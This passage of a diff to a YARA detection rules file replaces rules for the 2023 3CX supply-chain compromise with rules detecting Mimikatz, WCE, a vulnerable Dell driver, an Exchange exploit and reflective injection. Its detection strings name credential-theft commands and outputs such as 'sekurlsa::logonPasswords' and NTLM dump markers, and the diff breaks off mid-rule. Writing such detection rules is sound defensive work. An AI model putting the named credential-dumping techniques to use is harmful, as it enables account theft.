-		logic_hash = "dec8310c1f5b304a755737a0005bb33b1762f21ed380b2b98b0f5427948ab930"
-		score = 80
-		quality = 60
-		tags = "FILE"
-		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
+		logic_hash = "ff0c3e4f7491f5faec3e2688819ea5ec636a7d4eb57941afff6f53f60b0c0293"
+		score = 75
+		quality = 85
+		tags = "CVE-2021-33766"
 
 	strings:
-		$s1 = "raw.githubusercontent.com/IconStorages/images/main/icon%d.ico" wide fullword
-		$s2 = "https://raw.githubusercontent.com/IconStorages" wide fullword
-		$s3 = "icon%d.ico" wide fullword
-		$s4 = "__tutmc" ascii fullword
-		$op1 = { 2d ee a1 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 46 a0 00 00 44 8b 05 7f a2 00 00 e8 0a 0e 00 00 }
-		$op4 = { 4c 8d 5c 24 71 0f 57 c0 48 89 44 24 60 89 44 24 68 41 b9 15 cd 5b 07 0f 11 44 24 70 b8 b1 68 de 3a 41 ba a4 7b 93 02 }
-		$op5 = { f7 f3 03 d5 69 ca e8 03 00 00 ff 15 c9 0a 02 00 48 8d 44 24 30 45 33 c0 4c 8d 4c 24 38 48 89 44 24 20 }
+		$ss0 = "POST " ascii
+		$ss1 = " 500 0 0"
+		$sa1 = "/ecp/" ascii
+		$sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii
+		$sb1 = "/ecp/" ascii
+		$sb2 = "SecurityToken=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them or 5 of them
+		all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_3
+rule SIGNATURE_BASE_VULN_Dell_BIOS_Update_Driver_Dbutil_May21 : CVE_2021_21551 FILE
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
-		author = "Florian Roth , X__Junior (Nextron Systems)"
-		id = "d2d361b6-8485-57eb-b6eb-88785f42e93e"
-		date = "2023-03-29"
+		description = "Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it's usual location is in the C:\\Windows\\Temp folder"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d46866e-40fb-5fbf-b159-6bf688e638cb"
+		date = "2021-05-05"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L56-L79"
+		reference = "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_dell_bios_upd_driver.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adfe04904d796690631e5841ee1ee10c767f9f4c340e5b9df78918e981359d4d"
-		score = 80
+		logic_hash = "9cefb9fe28e818a3b0bc1c9ac570ddf2fac7ebf23408963656b7ec86d5bf3224"
+		score = 60
 		quality = 85
-		tags = ""
-		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
+		tags = "CVE-2021-21551, FILE"
+		hash1 = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5"
+		hash2 = "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1"
 
 	strings:
-		$opa1 = { 41 81 C0 ?? ?? ?? ?? 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1 41 69 D0 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 ?? ?? ?? ?? 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 }
-		$opa2 = { 8B C8 41 69 D1 ?? ?? ?? ?? C1 E1 ?? 33 C1 45 8B CA 8B C8 C1 E9 ?? 33 C1 81 C2 ?? ?? ?? ?? 8B C8 C1 E1 ?? 33 C1 41 8B C8 4C 0F AF CF 44 69 C2 ?? ?? ?? ?? 4C 03 C9 45 8B D1 4C 0F AF D7}
-		$opb1 = { 45 33 C9 48 89 6C 24 ?? 48 8D 44 24 ?? 48 89 6C 24 ?? 8B D3 48 89 B4 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 ?? FF 15 }
-		$opb2 = { 44 8B 0F 45 8B C6 48 8B 4D ?? 49 8B D7 44 89 64 24 ?? 48 89 7C 24 ?? 44 89 4C 24 ?? 4C 8D 4D ?? 48 89 44 24 ?? 44 89 64 24 ?? 4C 89 64 24 ?? FF 15}
-		$opb3 = { 48 FF C2 66 44 39 2C 56 75 ?? 4C 8D 4C 24 ?? 45 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 44 24 ?? 33 F6 48 8B 54 24 ?? 45 33 C9 48 8B 0B 48 89 74 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 74 24 ?? FF 15 }
-		$opb4 = { 33 C0 48 8D 6B ?? 4C 8D 4C 24 ?? 89 44 24 ?? BA ?? ?? ?? ?? 48 89 44 24 ?? 48 8B CD 89 44 24 ?? 44 8D 40 ?? 8B F8 FF 15}
+		$s1 = "\\DBUtilDrv2" ascii
+		$s2 = "DBUtil_2_3.Sys" ascii fullword
+		$s3 = "[ Dell BIOS Utility Driver - " ascii fullword
 
 	condition:
-		( all of ( $opa* ) ) or ( 1 of ( $opa* ) and 1 of ( $opb* ) ) or ( 3 of ( $opb* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1
+rule SIGNATURE_BASE_Mimikatz_Memory_Rule_1 : APT
 {
 	meta:
-		description = "Detects marker found in malicious DLLs related to 3CX compromise"
-		author = "X__Junior, Florian Roth (Nextron Systems)"
-		id = "9fc6eb94-d02f-5bcd-9f55-b6c6a8301b4f"
-		date = "2023-03-29"
-		modified = "2023-04-20"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L81-L98"
+		description = "Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)"
+		author = "Florian Roth"
+		id = "55cc7129-5ea0-5545-a8f6-b5306a014dd0"
+		date = "2014-12-22"
+		modified = "2023-07-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L5-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dcce1f5e769a2821d746a960cd333f8042fb71c8469aa41c29bbbd0dce79369c"
-		score = 75
+		logic_hash = "22064af570b8e0a93ca0d45484848eda3fbecfd27c88247ef0897fe53be4b7fc"
+		score = 70
 		quality = 85
-		tags = ""
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
-		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
+		tags = "APT"
+		nodeepdive = 1
 
 	strings:
-		$opx1 = { 41 80 7C 00 FD FE 75 ?? 41 80 7C 00 FE ED 75 ?? 41 80 7C 00 FF FA 75 ?? 41 80 3C 00 CE }
-		$opx2 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
+		$s1 = "sekurlsa::wdigest" fullword ascii
+		$s2 = "sekurlsa::logonPasswords" fullword ascii
+		$s3 = "sekurlsa::minidump" fullword ascii
+		$s4 = "sekurlsa::credman" fullword ascii
+		$fp1 = "\"x_mitre_version\": " ascii
+		$fp2 = "{\"type\":\"bundle\","
+		$fp3 = "use strict" ascii fullword
+		$fp4 = "\"url\":\"https://attack.mitre.org/" ascii
 
 	condition:
-		1 of them
+		1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_SUSP_NK_3CX_RC4_Key_Mar23_1 : FILE
+rule SIGNATURE_BASE_Mimikatz : FILE
 {
 	meta:
-		description = "Detects RC4 key used in 3CX binaries known to be malicious"
-		author = "Florian Roth (Nextron Systems)"
-		id = "18ea2185-11a1-51ad-a51a-df9e6357bb58"
-		date = "2023-03-29"
+		description = "mimikatz"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "840a5b8c-a311-50bc-a099-6b8ab1492e12"
+		date = "2022-11-16"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L100-L117"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L48-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8324b537b149ad3816b12ae0f887f66a284a8e1ef4fe7cf51eb21d59c0f055b9"
-		score = 70
+		logic_hash = "bf972a2c0465c3bbdde6f03d91c6f479d0f66c6d3e9512355de5a973164b56a5"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
-		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		tool_author = "Benjamin DELPY (gentilkiwi)"
 
 	strings:
-		$x1 = "3jB(2bsG#@c7"
+		$exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd }
+		$exe_x86_2 = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
+		$exe_x64_1 = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
+		$exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
+		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
+		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x5a4d ) and $x1
+		( all of ( $exe_x86_* ) ) or ( all of ( $exe_x64_* ) ) or ( any of ( $sys_* ) )
 }
-
-rule SIGNATURE_BASE_SUSP_3CX_App_Signed_Binary_Mar23_1 : FILE
+rule SIGNATURE_BASE_Wce
 {
 	meta:
-		description = "Detects 3CX application binaries signed with a certificate and created in a time frame in which other known malicious binaries have been created"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ce4c1d-1b7b-5e0c-af4c-05cb3ad0a4e0"
-		date = "2023-03-29"
+		description = "wce"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "857981ee-3f57-580b-8bfd-8d2109298e27"
+		date = "2020-08-10"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L119-L139"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L76-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3834b5ebb5a0db27a452fda1c97c921b2c9c8702505738232b15a3ed4a47dc47"
-		score = 65
+		logic_hash = "a16db99dcaaf1b6c33a738aab4f4d3812366258bc2f6dd32250ee1b1a0616f1c"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "fad482ded2e25ce9e1dd3d3ecc3227af714bdfbbde04347dbc1b21d6a3670405"
-		hash2 = "dde03348075512796241389dfea5560c20a3d2a2eac95c894e7bbed5e85a0acc"
+		tags = ""
+		tool_author = "Hernan Ochoa (hernano)"
 
 	strings:
-		$sa1 = "3CX Ltd1"
-		$sa2 = "3CX Desktop App" wide
-		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
+		$hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
+		$hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
+		$hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.timestamp > 1669680000 and pe.timestamp < 1680108505 and all of ( $sa* ) and $sc1
+		any of them
 }
-rule SIGNATURE_BASE_SUSP_3CX_MSI_Signed_Binary_Mar23_1 : FILE
+rule SIGNATURE_BASE_Power_Pe_Injection
 {
 	meta:
-		description = "Detects 3CX MSI installers signed with a known compromised certificate and signed in a time frame in which other known malicious binaries have been signed"
-		author = "Florian Roth (Nextron Systems)"
-		id = "15d6d8ca-6982-5095-9879-ce97269a71c6"
-		date = "2023-03-29"
+		description = "PowerShell with PE Reflective Injection"
+		author = "Benjamin DELPY (gentilkiwi)"
+		id = "a71fe9f2-9c2a-5650-a5c7-116b76f10db6"
+		date = "2020-08-10"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L141-L166"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L91-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0fa9821a02803473ce8139b19d005968b03c9765cff5b9ae5428a259d88cc9f"
-		score = 60
+		logic_hash = "64a7033d51e8933912f37ce68bffc216073a88cae1ea7492e71a812411ae6a9d"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
+		tags = ""
 
 	strings:
-		$a1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
-		$s1 = "3CX Ltd1"
-		$s2 = "202303"
+		$str_loadlib = "0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $a1 and $sc1 and ( $s1 in ( filesize -20000 .. filesize ) and $s2 in ( filesize -20000 .. filesize ) )
+		$str_loadlib
 }
-rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_Malicious_Samples_Mar23_1 : FILE
+rule SIGNATURE_BASE_Mimikatz_Logfile
 {
 	meta:
-		description = "Detects malicious macOS application related to 3CX compromise (decrypted payload)"
+		description = "Detects a log file generated by malicious hack tool mimikatz"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff39e577-7063-5025-bead-68394a86c87c"
-		date = "2023-03-30"
+		id = "921d85fc-fb4d-57ed-b4ac-203d5c6f1e8e"
+		date = "2015-03-31"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L168-L184"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c2733c2f7dcca82e5a0b2301777fb54853d04dfa893bcf88ecbec34d37e1a38a"
+		logic_hash = "4591cda5bd5a555292087da26193accc4f00d7c0611be8d5ab6dd4dabb14a0ef"
 		score = 80
 		quality = 85
-		tags = "FILE"
-		hash1 = "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb"
-		hash2 = "ac99602999bf9823f221372378f95baa4fc68929bac3a10e8d9a107ec8074eca"
-		hash3 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "20230313064152Z0"
-		$s2 = "Developer ID Application: 3CX (33CF4654HL)"
+		$s1 = "SID               :" ascii fullword
+		$s2 = "* NTLM     :" ascii fullword
+		$s3 = "Authentication Id :" ascii fullword
+		$s4 = "wdigest :" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_DYLIB_Mar23_1
+
+rule SIGNATURE_BASE_Mimikatz_Strings : FILE
 {
 	meta:
-		description = "Detects malicious DYLIB files related to 3CX compromise"
+		description = "Detects Mimikatz strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a19904d3-9b2d-561f-b734-20bf09584fa7"
-		date = "2023-03-30"
+		id = "d8f63b71-c66c-5c10-9268-2d8970f7c8a1"
+		date = "2016-06-08"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L121-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e52c76de1e995cc7084ddb390b60f4bc66e5bdf89aaa28ef3fd70578ed3145a6"
-		score = 80
+		logic_hash = "baba1e159c0fb23f68b80459291a2d2c52e84f742f51ca30b894f7fc6282ad7a"
+		score = 65
 		quality = 85
-		tags = ""
-		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
-		hash2 = "fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 37 15 00 13 16 16 1B 55 4F 54 4A 5A 52 2D 13 14
-               1E 15 0D 09 5A 34 2E 5A 4B 4A 54 4A 41 5A 2D 13
-               14 4C 4E 41 5A 02 4C 4E 53 5A 3B 0A 0A 16 1F 2D
-               1F 18 31 13 0E 55 4F 49 4D 54 49 4C 5A 52 31 32
-               2E 37 36 56 5A 16 13 11 1F 5A 3D 1F 19 11 15 53
-               5A 39 12 08 15 17 1F 55 4B 4A 42 54 4A 54 4F 49
-               4F 43 54 4B 48 42 5A 29 1B 1C 1B 08 13 55 4F 49
-               4D 54 49 4C 7A }
-		$xc2 = { 41 49 19 02 25 1b 0f 0e 12 25 0e 15 11 1f 14 25 19 15 14 0e 1f 14 0e 47 5f 09 41 25 25 0e 0f 0e 17 1b 47 }
-		$xc3 = { 55 29 03 09 0e 1f 17 55 36 13 18 08 1b 08 03 55 39 15 08 1f 29 1f 08 0c 13 19 1f 09 55 29 03 09 0e 1f 17 2c 1f 08 09 13 15 14 54 0a 16 13 09 0e }
+		$x1 = "sekurlsa::logonpasswords" fullword wide ascii
+		$x2 = "List tickets in MIT/Heimdall ccache" fullword ascii wide
+		$x3 = "kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x" fullword ascii wide
+		$x4 = "* Injecting ticket :" fullword wide ascii
+		$x5 = "mimidrv.sys" fullword wide ascii
+		$x6 = "Lists LM & NTLM credentials" fullword wide ascii
+		$x7 = "\\_ kerberos -" wide ascii
+		$x8 = "* unknow   :" fullword wide ascii
+		$x9 = "\\_ *Password replace ->" wide ascii
+		$x10 = "KIWI_MSV1_0_PRIMARY_CREDENTIALS KO" ascii wide
+		$x11 = "\\\\.\\mimidrv" wide ascii
+		$x12 = "Switch to MINIDUMP :" fullword wide ascii
+		$x13 = "[masterkey] with password: %s (%s user)" fullword wide
+		$x14 = "Clear screen (doesn't work with redirections, like PsExec)" fullword wide
+		$x15 = "** Session key is NULL! It means allowtgtsessionkey is not set to 1 **" fullword wide
+		$x16 = "[masterkey] with DPAPI_SYSTEM (machine, then user): " fullword wide
 
 	condition:
-		1 of them
+		(( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 3 of them ) ) and not pe.imphash ( ) == "77eaeca738dd89410a432c6bd6459907"
 }
-rule SIGNATURE_BASE_APT_SUSP_NK_3CX_Malicious_Samples_Mar23_1
+rule SIGNATURE_BASE_Appinithook : FILE
 {
 	meta:
-		description = "Detects indicator (event name) found in samples related to 3CX compromise"
+		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b233846a-19df-579b-a674-233d66824008"
-		date = "2023-03-30"
+		id = "73713011-3083-5cdf-b59c-f4da67d2d2ab"
+		date = "2015-07-15"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L216-L232"
+		reference = "https://goo.gl/Z292v6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L156-L176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ab8a4ac184eaba6eb56bfc49d6fa03f9b0877d75294aa9a242e9ac96482fab0"
+		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
+		logic_hash = "a4de3a062e309715c339a45a16a7ff8f9a55851cb41097a6925fd11f649547d2"
 		score = 70
 		quality = 85
-		tags = ""
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
-		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "AVMonitorRefreshEvent" wide fullword
+		$s0 = "\\Release\\AppInitHook.pdb" ascii
+		$s1 = "AppInitHook.dll" fullword ascii
+		$s2 = "mimikatz.exe" fullword wide
+		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
+		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
+		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
+		$s6 = "VoidFunc" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_4
+rule SIGNATURE_BASE_HKTL_Mimikatz_Skeletonkey_In_Memory_Aug20_1
 {
 	meta:
-		description = "Detects decrypted payload loaded inside 3CXDesktopApp.exe which downloads info stealer"
-		author = "MalGamy (Nextron Systems)"
-		id = "d11170df-570c-510c-80ec-39048acd0fbd"
-		date = "2023-03-29"
+		description = "Detects Mimikatz SkeletonKey in Memory"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e7c1c512-e944-5d87-ac57-cdc9ab7cf660"
+		date = "2020-08-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/WhichbufferArda/status/1641404343323688964?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L234-L249"
+		reference = "https://twitter.com/sbousseaden/status/1292143504131600384?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L178-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7"
-		logic_hash = "2fd56527a094b1f155cf33af402328835d4fb8aee9a058742d3e3763acef9e46"
-		score = 80
+		logic_hash = "0cc9a4d3b63e07a695df342bd2c96a55570502d6fd0ab9a1b61d63e28e1c3e05"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$op1 = {41 69 D0 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 [4] 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 [4] 33 C1 4C 0F AF CF 4D 03 CA 45 8B D1 4C 0F AF D7 41 8D 0C 11 49 C1 E9 ?? 02 C8}
-		$op2 = {4D 0F AF CC 44 69 C2 [4] 4C 03 C9 45 8B D1 4D 0F AF D4 41 8D 0C 11 41 81 C0 [4] 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1}
-		$op3 = {33 C1 4C 0F AF C7 8B C8 C1 E1 ?? 4D 03 C2 33 C1}
+		$x1 = { 60 ba 4f ca c7 44 24 34 dc 46 6c 7a c7 44 24 38
+              03 3c 17 81 c7 44 24 3c 94 c0 3d f6 }
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Backdoor_Mar23 : FILE
+rule SIGNATURE_BASE_HKTL_Mimikatz_Memssp_Hookfn
 {
 	meta:
-		description = "Detects 3CXDesktopApp MacOS Backdoor component"
-		author = "X__Junior (Nextron Systems)"
-		id = "80046c8e-0c2a-5885-b140-a6084f48160d"
-		date = "2023-03-30"
+		description = "Detects Default Mimikatz memssp module in-memory"
+		author = "SBousseaden"
+		id = "89940110-8a5e-5a28-bf64-3b568f8ef1f8"
+		date = "2020-08-26"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275"
+		reference = "https://github.com/sbousseaden/YaraHunts/blob/master/mimikatz_memssp_hookfn.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L192-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
-		logic_hash = "777a0a29c376f3697021dd627e716c31bda7933c5f40a8fe79b80e3cea46ce43"
-		score = 80
+		logic_hash = "27cf87f801111f17af76ab4c4f8329b73165f24f755d33edbb22d845bba6d3ff"
+		score = 70
 		quality = 85
-		tags = "FILE"
